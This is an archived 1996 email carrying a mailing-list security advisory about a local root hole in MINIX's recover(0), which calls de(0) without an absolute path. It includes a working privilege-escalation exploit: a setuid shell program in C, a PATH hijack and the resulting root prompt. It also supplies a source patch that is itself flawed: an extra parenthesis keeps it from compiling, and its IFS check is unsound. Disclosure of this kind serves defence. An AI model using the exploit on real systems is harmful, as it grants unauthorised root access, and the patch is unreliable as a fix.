From demonika@dimensional.com Sun Aug  4 20:18:34 1996
Date: Sat, 3 Aug 1996 19:14:20 -0600 (MDT)
From: Monika DeMire <demonika@dimensional.com>
To: Damien Sorder <jericho@dimensional.com>
Subject: minix

EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH
                     SECURITY ALERT - MINIX RECOVER(0)
EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH

                       Security hole in:  recover(0)
                       Compromises:       root privs
                       Exploitable:          locally
                       Quick fix:   chmod -s recover
                       Better fix:       (see below)

Description:

	There is a hole in the MINIX program recover(0) which allows any 
local user with access to the program to acquire unauthorised root 
privileges.  The vulnerability lies in an inproper system call to de(0) 
which does not use an absolute pathname.  Because of the trivial nature of 
creating an exploit it is advised that all MINIX users install a new and 
safer recover.
	This alert is not the first version.  If you obtained an earlier 
version, you should apply the new patch below, as there were more 
potential problems in the first version of the patch.

Exploit:

	$ cat > de.c
	#include <sys/types.h>
	#include <unistd.h>

	main (void)
	{
	  setuid(0); setgid(0);
	  execv("/usr/bin/sh", 0);
	  return(0);
	}
	^D
	$ cc -o de de.c
	$ PATH=.
	$ /usr/bin/recover foop
	#
	 
Fix:

	Fix by Chris F. <chris@whiterose.net>.  Patch this on 
/usr/src/commands/simple/recover.c and recompile.  It is worthy of note 
that this solution may not be enough if de(0) makes equally block-headed 
moves, therefore systems with security in mind should make the quick fix 
the only fix.

------CUT HERE------

19a20
> #include <stdio.h>
23a25,26
> #define	PATH_DE	"/usr/bin/de -r "
> 
33a37,41
>   if (strncmp(getenv("IFS"), "/", sizeof(char))) {
> 	printf("You will not get root that easily!\n");
> 	exit(1);
>   }
> 
37,38c45,46
< 	strcpy(buf, "de -r ");
< 	strcat(buf, argv[i]);
---
> 	strcpy(buf, PATH_DE));
> 	strncat(buf, argv[i], sizeof(buf) - sizeof(PATH_DE));

------CUT HERE------

Footers:

	Report by Chris F. <chris@whiterose.net>.  Subscribers to the EMH
mailing list need only

	$ mail -s subscribe emh-request@lists.uchsc.edu < /dev/null

to be included.

EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH
EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH